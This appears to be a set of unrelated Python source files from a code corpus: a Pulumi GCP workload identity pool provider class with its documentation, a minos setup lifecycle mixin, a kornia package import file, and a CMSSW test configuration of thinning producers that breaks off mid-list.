opts: Optional[pulumi.ResourceOptions] = None):
"""
A configuration for an external identity provider.
To get more information about WorkloadIdentityPoolProvider, see:
* [API documentation](https://cloud.google.com/iam/docs/reference/rest/v1beta/projects.locations.workloadIdentityPools.providers)
* How-to Guides
* [Managing workload identity providers](https://cloud.google.com/iam/docs/manage-workload-identity-pools-providers#managing_workload_identity_providers)
## Example Usage
### Iam Workload Identity Pool Provider Aws Basic
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs(
account_id="999999999999",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Iam Workload Identity Pool Provider Aws Full
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
display_name="Name of provider",
description="AWS identity pool provider for automated test",
disabled=True,
attribute_condition="attribute.aws_role==\"arn:aws:sts::999999999999:assumed-role/stack-eu-central-1-lambdaRole\"",
attribute_mapping={
"google.subject": "assertion.arn",
"attribute.aws_account": "assertion.account",
"attribute.environment": "assertion.arn.contains(\":instance-profile/Production\") ? \"prod\" : \"test\"",
},
aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs(
account_id="999999999999",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Iam Workload Identity Pool Provider Oidc Basic
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
attribute_mapping={
"google.subject": "assertion.sub",
},
oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs(
issuer_uri="https://sts.windows.net/azure-tenant-id",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Iam Workload Identity Pool Provider Oidc Full
```python
import pulumi
import pulumi_gcp as gcp
pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool",
opts=pulumi.ResourceOptions(provider=google_beta))
example = gcp.iam.WorkloadIdentityPoolProvider("example",
workload_identity_pool_id=pool.workload_identity_pool_id,
workload_identity_pool_provider_id="example-prvdr",
display_name="Name of provider",
description="OIDC identity pool provider for automated test",
disabled=True,
attribute_condition="\"e968c2ef-047c-498d-8d79-16ca1b61e77e\" in assertion.groups",
attribute_mapping={
"google.subject": "\"azure::\" + assertion.tid + \"::\" + assertion.sub",
"attribute.tid": "assertion.tid",
"attribute.managed_identity_name": \"\"\" {
"8bb39bdb-1cc5-4447-b7db-a19e920eb111":"workload1",
"55d36609-9bcf-48e0-a366-a3cf19027d2a":"workload2"
}[assertion.oid]
\"\"\",
},
oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs(
allowed_audiences=[
"https://example.com/gcp-oidc-federation",
"example.com/gcp-oidc-federation",
],
issuer_uri="https://sts.windows.net/azure-tenant-id",
),
opts=pulumi.ResourceOptions(provider=google_beta))
```
## Import
WorkloadIdentityPoolProvider can be imported using any of these accepted formats
```sh
$ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default projects/{{project}}/locations/global/workloadIdentityPools/{{workload_identity_pool_id}}/providers/{{workload_identity_pool_provider_id}}
```
```sh
$ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{project}}/{{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}}
```
```sh
$ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}}
```
:param str resource_name: The name of the resource.
:param WorkloadIdentityPoolProviderArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(WorkloadIdentityPoolProviderArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
attribute_condition: Optional[pulumi.Input[str]] = None,
attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
aws: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
oidc: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]] = None,
project: Optional[pulumi.Input[str]] = None,
workload_identity_pool_id: Optional[pulumi.Input[str]] = None,
workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = WorkloadIdentityPoolProviderArgs.__new__(WorkloadIdentityPoolProviderArgs)
__props__.__dict__["attribute_condition"] = attribute_condition
__props__.__dict__["attribute_mapping"] = attribute_mapping
__props__.__dict__["aws"] = aws
__props__.__dict__["description"] = description
__props__.__dict__["disabled"] = disabled
__props__.__dict__["display_name"] = display_name
__props__.__dict__["oidc"] = oidc
__props__.__dict__["project"] = project
if workload_identity_pool_id is None and not opts.urn:
raise TypeError("Missing required property 'workload_identity_pool_id'")
__props__.__dict__["workload_identity_pool_id"] = workload_identity_pool_id
if workload_identity_pool_provider_id is None and not opts.urn:
raise TypeError("Missing required property 'workload_identity_pool_provider_id'")
__props__.__dict__["workload_identity_pool_provider_id"] = workload_identity_pool_provider_id
__props__.__dict__["name"] = None
__props__.__dict__["state"] = None
super(WorkloadIdentityPoolProvider, __self__).__init__(
'gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
attribute_condition: Optional[pulumi.Input[str]] = None,
attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
aws: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
oidc: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]] = None,
project: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
workload_identity_pool_id: Optional[pulumi.Input[str]] = None,
workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None) -> 'WorkloadIdentityPoolProvider':
"""
Get an existing WorkloadIdentityPoolProvider resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] attribute_condition: A [Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, that restricts which otherwise valid authentication credentials issued by the
provider are accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credentials are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi

# Illustrative sketch: accept only identities whose mapped `google.groups`
# value contains `admins`.
attribute_condition = "'admins' in google.groups"
```
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi

# Illustrative sketch: map the OIDC `sub` claim to `google.subject`.
attribute_mapping = {
    "google.subject": "assertion.sub",
}
```
:param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']] aws: An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
:param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters.
:param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
:param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters.
:param pulumi.Input[str] name: The resource name of the provider as
'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'.
:param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] state: The state of the provider.
* STATE_UNSPECIFIED: State unspecified.
* ACTIVE: The provider is active, and may be used to validate authentication credentials.
* DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted
after approximately 30 days. You can restore a soft-deleted provider using
UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider
until it is permanently deleted.
:param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
:param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _WorkloadIdentityPoolProviderState.__new__(_WorkloadIdentityPoolProviderState)
__props__.__dict__["attribute_condition"] = attribute_condition
__props__.__dict__["attribute_mapping"] = attribute_mapping
__props__.__dict__["aws"] = aws
__props__.__dict__["description"] = description
__props__.__dict__["disabled"] = disabled
__props__.__dict__["display_name"] = display_name
__props__.__dict__["name"] = name
__props__.__dict__["oidc"] = oidc
__props__.__dict__["project"] = project
__props__.__dict__["state"] = state
__props__.__dict__["workload_identity_pool_id"] = workload_identity_pool_id
__props__.__dict__["workload_identity_pool_provider_id"] = workload_identity_pool_provider_id
return WorkloadIdentityPoolProvider(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="attributeCondition")
def attribute_condition(self) -> pulumi.Output[Optional[str]]:
"""
A [Common Expression Language](https://opensource.google/projects/cel) expression, in
plain text, that restricts which otherwise valid authentication credentials issued by the
provider are accepted.
The expression must output a boolean representing whether to allow the federation.
The following keywords may be referenced in the expressions:
* `assertion`: JSON representing the authentication credential issued by the provider.
* `google`: The Google attributes mapped from the assertion in the `attribute_mappings`.
* `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`.
The maximum length of the attribute condition expression is 4096 characters. If
unspecified, all valid authentication credentials are accepted.
The following example shows how to only allow credentials with a mapped `google.groups`
value of `admins`:
```python
import pulumi

# Illustrative sketch: accept only identities whose mapped `google.groups`
# value contains `admins`.
attribute_condition = "'admins' in google.groups"
```
"""
return pulumi.get(self, "attribute_condition")
@property
@pulumi.getter(name="attributeMapping")
def attribute_mapping(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Maps attributes from authentication credentials issued by an external identity provider
to Google Cloud attributes, such as `subject` and `segment`.
Each key must be a string specifying the Google Cloud IAM attribute to map to.
The following keys are supported:
* `google.subject`: The principal IAM is authenticating. You can reference this value
in IAM bindings. This is also the subject that appears in Cloud Logging logs.
Cannot exceed 127 characters.
* `google.groups`: Groups the external identity belongs to. You can grant groups
access to resources using an IAM `principalSet` binding; access applies to all
members of the group.
You can also provide custom attributes by specifying `attribute.{custom_attribute}`,
where `{custom_attribute}` is the name of the custom attribute to be mapped. You can
define a maximum of 50 custom attributes. The maximum length of a mapped attribute key
is 100 characters, and the key may only contain the characters [a-z0-9_].
You can reference these attributes in IAM policies to define fine-grained access for a
workload to Google Cloud resources. For example:
* `google.subject`:
`principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}`
* `google.groups`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}`
* `attribute.{custom_attribute}`:
`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}`
Each value must be a [Common Expression Language](https://opensource.google/projects/cel)
function that maps an identity provider credential to the normalized attribute specified
by the corresponding map key.
You can use the `assertion` keyword in the expression to access a JSON representation of
the authentication credential issued by the provider.
The maximum length of an attribute mapping expression is 2048 characters. When evaluated,
the total size of all mapped attributes must not exceed 8KB.
For AWS providers, the following rules apply:
- If no attribute mapping is defined, the following default mapping applies:
```python
import pulumi
```
- If any custom attribute mappings are defined, they must include a mapping to the
`google.subject` attribute.
For OIDC providers, the following rules apply:
- Custom attribute mappings must be defined, and must include a mapping to the
`google.subject` attribute. For example, the following maps the `sub` claim of the
incoming credential to the `subject` attribute on a Google token.
```python
import pulumi

# Illustrative sketch: map the OIDC `sub` claim to `google.subject`.
attribute_mapping = {
    "google.subject": "assertion.sub",
}
```
"""
return pulumi.get(self, "attribute_mapping")
@property
@pulumi.getter
def aws(self) -> pulumi.Output[Optional['outputs.WorkloadIdentityPoolProviderAws']]:
"""
An Amazon Web Services identity provider. Not compatible with the property oidc.
Structure is documented below.
"""
return pulumi.get(self, "aws")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description for the provider. Cannot exceed 256 characters.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def disabled(self) -> pulumi.Output[Optional[bool]]:
"""
Whether the provider is disabled. You cannot use a disabled provider to exchange tokens.
However, existing tokens still grant access.
"""
return pulumi.get(self, "disabled")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[Optional[str]]:
"""
A display name for the provider. Cannot exceed 32 characters.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The resource name of the provider as
'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def oidc(self) -> pulumi.Output[Optional['outputs.WorkloadIdentityPoolProviderOidc']]:
"""
An OpenId Connect 1.0 identity provider. Not compatible with the property aws.
Structure is documented below.
"""
return pulumi.get(self, "oidc")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The state of the provider.
* STATE_UNSPECIFIED: State unspecified.
* ACTIVE: The provider is active, and may be used to validate authentication credentials.
* DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted
after approximately 30 days. You can restore a soft-deleted provider using
UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider
until it is permanently deleted.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="workloadIdentityPoolId")
def workload_identity_pool_id(self) -> pulumi.Output[str]:
"""
The ID used for the pool, which is the final component of the pool resource name. This
value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
return pulumi.get(self, "workload_identity_pool_id")
@property
@pulumi.getter(name="workloadIdentityPoolProviderId")
def workload_identity_pool_provider_id(self) -> pulumi.Output[str]:
"""
The ID for the provider, which becomes the final component of the resource name. This
value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix
`gcp-` is reserved for use by Google, and may not be specified.
"""
return pulumi.get(self, "workload_identity_pool_provider_id")
|
packages/core/minos-microservice-common/minos/common/setup.py | minos-framework/minos-python | 247 | 29767 | from __future__ import (
annotations,
)
import logging
import warnings
from pathlib import (
Path,
)
from typing import (
TYPE_CHECKING,
Optional,
Type,
TypeVar,
Union,
)
from .object import (
Object,
)
if TYPE_CHECKING:
from .config import (
Config,
)
logger = logging.getLogger(__name__)
S = TypeVar("S", bound="SetupMixin")
class SetupMixin(Object):
"""Setup Mixin class."""
def __init__(self, *args, already_setup: bool = False, **kwargs):
super().__init__(**kwargs)
self._already_setup = already_setup
@property
def already_setup(self) -> bool:
"""Already Setup getter.
:return: A boolean value.
"""
return self._already_setup
@property
def already_destroyed(self) -> bool:
"""Already Destroy getter.
:return: A boolean value.
"""
return not self._already_setup
@classmethod
def from_config(cls: Type[S], config: Optional[Union[Config, Path]] = None, **kwargs) -> S:
"""Build a new instance from config.
:param config: Config instance. If `None` is provided, default config is chosen.
:param kwargs: Additional named arguments.
:return: An instance of the called class.
"""
if isinstance(config, Path):
from .config import (
Config,
)
config = Config(config)
if config is None:
from .config import (
Config,
)
from .injections import (
Inject,
)
config = Inject.resolve(Config)
logger.info(f"Building a {cls.__name__!r} instance from config...")
return cls._from_config(config=config, **kwargs)
@classmethod
def _from_config(cls: Type[S], config: Config, **kwargs) -> S:
return cls(**kwargs)
async def __aenter__(self: S) -> S:
await self.setup()
return self
async def setup(self) -> None:
"""Setup miscellaneous repository things.
:return: This method does not return anything.
"""
if not self._already_setup:
logger.debug(f"Setting up a {type(self).__name__!r} instance...")
await self._setup()
self._already_setup = True
async def _setup(self) -> None:
return
async def __aexit__(self, exc_type, exc_value, exc_traceback):
await self.destroy()
async def destroy(self) -> None:
"""Destroy miscellaneous repository things.
:return: This method does not return anything.
"""
if self._already_setup:
logger.debug(f"Destroying a {type(self).__name__!r} instance...")
await self._destroy()
self._already_setup = False
async def _destroy(self) -> None:
"""Destroy miscellaneous repository things."""
def __del__(self):
if not getattr(self, "already_destroyed", True):
warnings.warn(
f"A not destroyed {type(self).__name__!r} instance is trying to be deleted...", ResourceWarning
)
class MinosSetup(SetupMixin):
"""Minos Setup class."""
def __init__(self, *args, **kwargs):
warnings.warn(f"{MinosSetup!r} has been deprecated. Use {SetupMixin} instead.", DeprecationWarning)
super().__init__(*args, **kwargs)
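# Minimal lifecycle sketch (illustrative only; ``_ExampleRepository`` is a hypothetical
# subclass, not part of the package). Subclasses override ``_setup``/``_destroy`` and are
# normally driven through ``async with``, which calls ``setup()`` on enter and
# ``destroy()`` on exit.
class _ExampleRepository(SetupMixin):
    """Hypothetical subclass used only to illustrate the lifecycle."""

    async def _setup(self) -> None:
        logger.debug("opening resources...")

    async def _destroy(self) -> None:
        logger.debug("closing resources...")


async def _example_lifecycle() -> None:
    async with _ExampleRepository() as repository:
        # Between enter and exit the instance reports itself as set up.
        assert repository.already_setup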
|
kornia/augmentation/_3d/intensity/__init__.py | Ishticode/kornia | 418 | 29771 | <gh_stars>100-1000
from kornia.augmentation._3d.intensity.equalize import RandomEqualize3D
from kornia.augmentation._3d.intensity.motion_blur import RandomMotionBlur3D
|
DataFormats/FWLite/test/RefTest_cfg.py | ckamtsikis/cmssw | 852 | 29779 | <reponame>ckamtsikis/cmssw<gh_stars>100-1000
# Configuration file for RefTest_t
import FWCore.ParameterSet.Config as cms
process = cms.Process("TEST")
process.load("FWCore.Framework.test.cmsExceptionsFatal_cff")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(2)
)
process.source = cms.Source("EmptySource")
process.WhatsItESProducer = cms.ESProducer("WhatsItESProducer")
process.DoodadESSource = cms.ESSource("DoodadESSource")
process.Thing = cms.EDProducer("ThingProducer",
offsetDelta = cms.int32(1)
)
process.OtherThing = cms.EDProducer("OtherThingProducer")
process.thingProducer = cms.EDProducer("ThingProducer",
offsetDelta = cms.int32(100),
nThings = cms.int32(50)
)
process.trackOfThingsProducerA = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(0, 1, 2, 3, 4, 5, 6, 7, 8)
)
process.trackOfThingsProducerB = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(0, 1, 2, 3)
)
process.trackOfThingsProducerC = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(4, 5, 6, 7)
)
process.trackOfThingsProducerD = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(10, 11, 12, 13, 14, 15, 16, 17, 18)
)
process.trackOfThingsProducerDMinus = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(10, 11, 12, 13, 14, 15, 16, 17)
)
process.trackOfThingsProducerDPlus = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(10, 11, 12, 13, 14, 15, 16, 17, 18, 21)
)
process.trackOfThingsProducerE = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(10, 11, 12, 13, 14)
)
process.trackOfThingsProducerF = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(14, 15, 16, 17)
)
process.trackOfThingsProducerG = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(20, 21, 22, 23, 24, 25, 26, 27, 28)
)
process.trackOfThingsProducerH = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(20, 21, 22, 23)
)
process.trackOfThingsProducerI = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(24, 25, 26, 27)
)
process.trackOfThingsProducerJ = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(30, 31, 32, 33, 34, 35, 36, 37, 38)
)
process.trackOfThingsProducerK = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(30, 31, 32, 33)
)
process.trackOfThingsProducerL = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(34, 35, 36, 37)
)
process.trackOfThingsProducerM = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(40, 41, 42, 43, 44, 45, 46, 47, 48)
)
process.trackOfThingsProducerN = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(40, 41, 42, 43)
)
process.trackOfThingsProducerO = cms.EDProducer("TrackOfThingsProducer",
inputTag = cms.InputTag('thingProducer'),
keysToReference = cms.vuint32(44, 45, 46, 47)
)
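# The thinning producers below form a two-level hierarchy: A, D, G, J and M are thinned
# directly from 'thingProducer', while B/C, E/F, H/I, K/L and N/O are thinned again from
# those intermediate collections, each keeping only the keys selected by the matching
# TrackOfThingsProducer module above.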
process.thinningThingProducerA = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thingProducer'),
trackTag = cms.InputTag('trackOfThingsProducerA'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(50)
)
process.thinningThingProducerB = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerA'),
trackTag = cms.InputTag('trackOfThingsProducerB'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerC = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerA'),
trackTag = cms.InputTag('trackOfThingsProducerC'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerD = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thingProducer'),
trackTag = cms.InputTag('trackOfThingsProducerD'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(50)
)
process.thinningThingProducerE = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerD'),
trackTag = cms.InputTag('trackOfThingsProducerE'),
offsetToThinnedKey = cms.uint32(10),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerF = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerD'),
trackTag = cms.InputTag('trackOfThingsProducerF'),
offsetToThinnedKey = cms.uint32(10),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerG = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thingProducer'),
trackTag = cms.InputTag('trackOfThingsProducerG'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(50)
)
process.thinningThingProducerH = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerG'),
trackTag = cms.InputTag('trackOfThingsProducerH'),
offsetToThinnedKey = cms.uint32(20),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerI = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerG'),
trackTag = cms.InputTag('trackOfThingsProducerI'),
offsetToThinnedKey = cms.uint32(20),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerJ = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thingProducer'),
trackTag = cms.InputTag('trackOfThingsProducerJ'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(50)
)
process.thinningThingProducerK = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerJ'),
trackTag = cms.InputTag('trackOfThingsProducerK'),
offsetToThinnedKey = cms.uint32(30),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerL = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerJ'),
trackTag = cms.InputTag('trackOfThingsProducerL'),
offsetToThinnedKey = cms.uint32(30),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerM = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thingProducer'),
trackTag = cms.InputTag('trackOfThingsProducerM'),
offsetToThinnedKey = cms.uint32(0),
expectedCollectionSize = cms.uint32(50)
)
process.thinningThingProducerN = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerM'),
trackTag = cms.InputTag('trackOfThingsProducerN'),
offsetToThinnedKey = cms.uint32(40),
expectedCollectionSize = cms.uint32(9)
)
process.thinningThingProducerO = cms.EDProducer("ThinningThingProducer",
inputTag = cms.InputTag('thinningThingProducerM'),
trackTag = cms.InputTag('trackOfThingsProducerO'),
offsetToThinnedKey = cms.uint32(40),
expectedCollectionSize = cms.uint32(9)
)
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('goodDataFormatsFWLite.root'),
outputCommands = cms.untracked.vstring(
'keep *',
'drop *_thingProducer_*_*',
'drop *_thinningThingProducerD_*_*',
'drop *_thinningThingProducerH_*_*',
'drop *_thinningThingProducerI_*_*',
'drop *_thinningThingProducerJ_*_*',
'drop *_thinningThingProducerK_*_*',
'drop *_thinningThingProducerL_*_*',
'drop *_thinningThingProducerM_*_*',
